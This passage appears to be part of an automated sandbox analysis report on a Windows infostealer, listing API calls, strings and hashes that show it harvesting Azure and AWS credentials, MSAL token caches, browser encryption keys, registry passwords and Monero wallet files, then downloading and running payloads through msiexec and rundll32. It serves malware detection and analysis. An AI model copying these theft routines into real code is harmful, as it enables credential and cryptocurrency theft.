                                • Opcode Fuzzy Hash: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                                • Instruction Fuzzy Hash: 09812BB1950118ABEB68DF54CC91FEEB7B8FF88704F008298E109A6180DF706B85CF95
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00944DCD
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                  • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                • lstrcat.KERNEL32(?,00000000), ref: 00944E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00944E59
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                  • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                  • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00944EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00944EE5
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449B0
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,009508D2), ref: 009449C5
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449E2
                                  • Part of subcall function 00944910: PathMatchSpecA.SHLWAPI(?,?), ref: 00944A1E
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,015BFAD0), ref: 00944A4A
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FF8), ref: 00944A5C
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A70
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FFC), ref: 00944A82
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A96
                                  • Part of subcall function 00944910: CopyFileA.KERNEL32(?,?,00000001), ref: 00944AAC
                                  • Part of subcall function 00944910: DeleteFileA.KERNEL32(?), ref: 00944B31
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: f10b22fbd1e64942480cc3c2529df0aef9f28247f7889c51f7bb3d26e485f3ac
                                • Instruction ID: 7d5fa2f9aa7e30a7d89a47d0717de66577da3496553955cb6ac84f8e58d5ecb2
                                • Opcode Fuzzy Hash: f10b22fbd1e64942480cc3c2529df0aef9f28247f7889c51f7bb3d26e485f3ac
                                • Instruction Fuzzy Hash: 704172BA95021867DB50F770EC47FEE7338ABA4709F404494B589660C1EEB46BCD8B93
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094906C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                                • Instruction ID: ffdebac5cb52f7b8db60e5fc83bd1f4f962d87bf221f5c12ee654be320677bba
                                • Opcode Fuzzy Hash: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                                • Instruction Fuzzy Hash: C471EE71910208ABDB44EFE4DC89FEEB7B9BF88700F108508F51AA7290DF74A945CB61
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 009431C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0094335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 009434EA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                                • Instruction ID: 2cbdb4b7556286c8c9c3673ed750da3b511fb047730361caf4a37aad55bcf0d2
                                • Opcode Fuzzy Hash: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                                • Instruction Fuzzy Hash: C3120C71850108AAEB19FBA0DC92FEEB738EF94304F504159F50676191EF342B4ACFA6
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                  • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                  • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                  • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                  • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                  • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                • lstrlen.KERNEL32(00000000), ref: 0094532F
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                • lstrlen.KERNEL32(00000000), ref: 00945383
                                • lstrlen.KERNEL32(00000000), ref: 009453AE
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: ecdf44d4c6e99a0248903150cd85d35bcaaeb67311c9f97b7a5029113082b81f
                                • Instruction ID: e203c15ceb7f9c325d10192dc6ec2b87d81620a60eeb2874638bb7a64aa5fc27
                                • Opcode Fuzzy Hash: ecdf44d4c6e99a0248903150cd85d35bcaaeb67311c9f97b7a5029113082b81f
                                • Instruction Fuzzy Hash: 99510B309501489BEB18FF60C992FED7779EF90309F504018F80A6B5A2EF346B45CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1d92610eaea2c6c70fdb89d5c70c4504655e16713ad40c9d1cd6225c98b2c254
                                • Instruction ID: c8de686e95fe26f56ee319115c97512241bfc2d2e667825dc6ecb1bdc53d3b25
                                • Opcode Fuzzy Hash: 1d92610eaea2c6c70fdb89d5c70c4504655e16713ad40c9d1cd6225c98b2c254
                                • Instruction Fuzzy Hash: 34C173B5940219ABCB14EF60DC89FEE7379BB94304F104598F50AA7281EF74AA85CF91
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 009442EC
                                • lstrcat.KERNEL32(?,015BF638), ref: 0094430B
                                • lstrcat.KERNEL32(?,?), ref: 0094431F
                                • lstrcat.KERNEL32(?,015BE560), ref: 00944333
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                  • Part of subcall function 00939CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 009493C0: GlobalAlloc.KERNEL32(00000000,009443DD,009443DD), ref: 009493D3
                                • StrStrA.SHLWAPI(?,015BF6E0), ref: 009443F3
                                • GlobalFree.KERNEL32(?), ref: 00944512
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                  • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                  • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 009444A3
                                • StrCmpCA.SHLWAPI(?,009508D1), ref: 009444C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009444D2
                                • lstrcat.KERNEL32(00000000,?), ref: 009444E5
                                • lstrcat.KERNEL32(00000000,00950FB8), ref: 009444F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: d6e9090809c6fb31308a58aa229027eb42465a49981d27f3a6b64a836e78a9d6
                                • Instruction ID: 1f787fe5ee584fafeb7b959d47781e49f97ad1280fc587d6afe38fd8303623bb
                                • Opcode Fuzzy Hash: d6e9090809c6fb31308a58aa229027eb42465a49981d27f3a6b64a836e78a9d6
                                • Instruction Fuzzy Hash: 1B7115B6D10208ABDB14EBA0DC85FEE7379ABC8304F044598F60997181EE75EB45CF92
                                APIs
                                  • Part of subcall function 009312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                  • Part of subcall function 009312A0: RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                  • Part of subcall function 009312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                  • Part of subcall function 009312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                  • Part of subcall function 009312A0: RegCloseKey.ADVAPI32(?), ref: 009312FF
                                • lstrcat.KERNEL32(?,00000000), ref: 0093134F
                                • lstrlen.KERNEL32(?), ref: 0093135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00931377
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00931465
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 009314EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 108f39e6682dde5e2164deac765bbd98286407efcc4925c66b21b37e8c0bc5a0
                                • Instruction ID: 9e15032d2d827147b0db68e9b4d003ff2e8a9d3dc4c851269376641920693a1a
                                • Opcode Fuzzy Hash: 108f39e6682dde5e2164deac765bbd98286407efcc4925c66b21b37e8c0bc5a0
                                • Instruction Fuzzy Hash: 445154B1D501185BDB15FB60DD92FED733CEF94304F4041A8B60AA2092EE306B89CFA6
                                APIs
                                  • Part of subcall function 009372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                  • Part of subcall function 009372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                  • Part of subcall function 009372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                  • Part of subcall function 009372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                  • Part of subcall function 009372D0: HeapFree.KERNEL32(00000000), ref: 00937459
                                • lstrcat.KERNEL32(00000000,009517FC), ref: 00937606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00937648
                                • lstrcat.KERNEL32(00000000, : ), ref: 0093765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0093768F
                                • lstrcat.KERNEL32(00000000,00951804), ref: 009376A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009376D3
                                • lstrcat.KERNEL32(00000000,00951808), ref: 009376ED
                                • task.LIBCPMTD ref: 009376FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                                • Instruction ID: 5ec647a6c582a957a27727c0308984f9cfbf438bdb31aee4b8468788b4cf05a7
                                • Opcode Fuzzy Hash: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                                • Instruction Fuzzy Hash: EA3169B1900209DBCB48EBE4DC96EEFB378ABC5706F104408F116A7290DE34A986CF52
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • InternetOpenA.WININET(00950DF7,00000001,00000000,00000000,00000000), ref: 0093610F
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0093618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009361B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 009361DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00936249
                                • InternetCloseHandle.WININET(?), ref: 00936253
                                • InternetCloseHandle.WININET(00000000), ref: 00936260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                                • Instruction ID: 18b475e5c52ce719fc412b8c57782533c74d9b380f2c3a393bfd4b5e98a97139
                                • Opcode Fuzzy Hash: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                                • Instruction Fuzzy Hash: EB5150B1940218ABEB24DF90DC45FEE77B8EB84705F108498F609A71C1DB74AE85CFA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                • HeapFree.KERNEL32(00000000), ref: 00937459
                                • task.LIBCPMTD ref: 00937555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                                • Instruction ID: a01cd4bbdf2d3ec8be69b8b4c95613b8877e3545dbc0857546d4a99ea5c42c47
                                • Opcode Fuzzy Hash: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                                • Instruction Fuzzy Hash: C4610CB590425C9BDB24DB50DD45BDAB7B8BF84304F0081E9E689A6141DF706FC9CF91
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • lstrlen.KERNEL32(00000000), ref: 0093BC9F
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
                                • lstrlen.KERNEL32(00000000), ref: 0093BDA5
                                • lstrlen.KERNEL32(00000000), ref: 0093BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                                • Instruction ID: 7e6bbebbf11fc6a4978f26e091f0356ef821848f9cd5d54b31cf230e4888db14
                                • Opcode Fuzzy Hash: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                                • Instruction Fuzzy Hash: 49B14F72950108ABEB14FBA0DC96FEE7339EF94304F404558F506A7191EF346E49CBA6
                                APIs
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                                • Instruction ID: 6cea885e9e9763fa506887a533aa9cc9f5c447493edcbe045ce7fb046804b304
                                • Opcode Fuzzy Hash: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                                • Instruction Fuzzy Hash: E6F05E70908209EFD3889FE0E909B2C7B74FB45703F040198E60D87290DA745F829B97
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00934FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00934FD1
                                • InternetOpenA.WININET(00950DDF,00000000,00000000,00000000,00000000), ref: 00934FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00935011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00935041
                                • InternetCloseHandle.WININET(?), ref: 009350B9
                                • InternetCloseHandle.WININET(?), ref: 009350C6
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 022dd9b2bf9106c0b2b18f7db1097c9c26b3c5742a7570f89c495c18327884f0
                                • Instruction ID: a982952f342d708185a67f4acbcaccacb19188840dd7627c26429f997a56ea37
                                • Opcode Fuzzy Hash: 022dd9b2bf9106c0b2b18f7db1097c9c26b3c5742a7570f89c495c18327884f0
                                • Instruction Fuzzy Hash: B63119B4A40218ABDB64CF54DC85BDCB7B4EB88704F1081D8FA09A7280CB746EC58F99
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015BF5A8,00000000,?,00950E2C,00000000,?,00000000), ref: 00948130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00948158
                                • wsprintfA.USER32 ref: 009481AC
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                                • Instruction ID: 88aa9ccf6dfc2862786d6957686e13484d38c00e966458828e76932e676f4886
                                • Opcode Fuzzy Hash: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                                • Instruction Fuzzy Hash: C421FEB1E44218ABDB00DFD5DC49FAFB7B8FB88B14F104519F605BB280DB7869018BA5
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                                • wsprintfA.USER32 ref: 00948459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,015BF410,00000000,000F003F,?,00000400), ref: 009484EC
                                • lstrlen.KERNEL32(?), ref: 00948501
                                • RegQueryValueExA.ADVAPI32(00000000,015BF3B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00950B34), ref: 00948599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094861A
                                Strings
                                 Memory Dump Source
